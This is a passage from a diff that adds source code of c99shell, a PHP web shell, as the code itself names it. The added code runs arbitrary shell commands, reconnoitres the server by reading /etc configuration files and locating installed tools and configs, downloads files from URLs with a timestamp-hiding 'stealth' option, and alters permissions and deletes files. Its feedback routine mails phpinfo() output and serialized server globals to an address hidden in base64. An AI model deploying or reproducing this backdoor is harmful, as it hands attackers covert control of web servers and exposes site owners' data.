+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
+ if (!empty($submit))
+ {
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+  if (!empty($fdbk_ref))
+  {
+   $tmp = @ob_get_contents();
+   ob_clean();
+   phpinfo();
+   $phpinfo = base64_encode(ob_get_contents());
+   ob_clean();
+   echo $tmp;
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+  }
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+ }
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+}
+if ($act == "search")
+{
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = true;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== false) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  //Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
